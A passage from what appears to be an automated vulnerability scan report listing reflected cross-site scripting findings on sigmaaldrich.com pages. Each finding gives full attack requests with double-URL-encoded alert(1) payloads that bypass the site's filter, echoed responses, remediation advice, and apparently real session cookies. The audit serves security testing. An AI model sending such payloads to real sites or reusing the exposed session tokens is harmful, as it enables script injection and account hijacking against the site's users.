WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography2b3d7";alert(1)//0b4b8116511/fluka-analytical/customware-oem.html","E404") ;
   </script>
...[SNIP]...

1.13. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64f3d%2522%253balert%25281%2529%252f%252f484e4ebf13c was submitted in the REST URL parameter 2. This input was echoed as 64f3d";alert(1)//484e4ebf13c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/fluka-analytical64f3d%2522%253balert%25281%2529%252f%252f484e4ebf13c/customware-oem.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/fluka-analytical64f3d";alert(1)//484e4ebf13c/customware-oem.html","E404") ;
   </script>
...[SNIP]...

1.14. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6189a%2522%253balert%25281%2529%252f%252f820223a893e was submitted in the REST URL parameter 3. This input was echoed as 6189a";alert(1)//820223a893e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/fluka-analytical/6189a%2522%253balert%25281%2529%252f%252f820223a893e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/fluka-analytical/6189a";alert(1)//820223a893e","E404") ;
   </script>
...[SNIP]...

1.15. http://www.sigmaaldrich.com/analytical-chromatography/gas-chromatography.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/gas-chromatography.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60f3%2522%253balert%25281%2529%252f%252f722fc13639f was submitted in the REST URL parameter 1. This input was echoed as d60f3";alert(1)//722fc13639f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyd60f3%2522%253balert%25281%2529%252f%252f722fc13639f/gas-chromatography.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyd60f3";alert(1)//722fc13639f/gas-chromatography.html","E404") ;
   </script>
...[SNIP]...

1.16. http://www.sigmaaldrich.com/analytical-chromatography/gas-chromatography.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/gas-chromatography.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1692%2522%253balert%25281%2529%252f%252f930c055d40c was submitted in the REST URL parameter 2. This input was echoed as e1692";alert(1)//930c055d40c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/e1692%2522%253balert%25281%2529%252f%252f930c055d40c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/e1692";alert(1)//930c055d40c","E404") ;
   </script>
...[SNIP]...

1.17. http://www.sigmaaldrich.com/analytical-chromatography/hplc.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/hplc.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27425%2522%253balert%25281%2529%252f%252f263fc626307 was submitted in the REST URL parameter 1. This input was echoed as 27425";alert(1)//263fc626307 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography27425%2522%253balert%25281%2529%252f%252f263fc626307/hplc.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
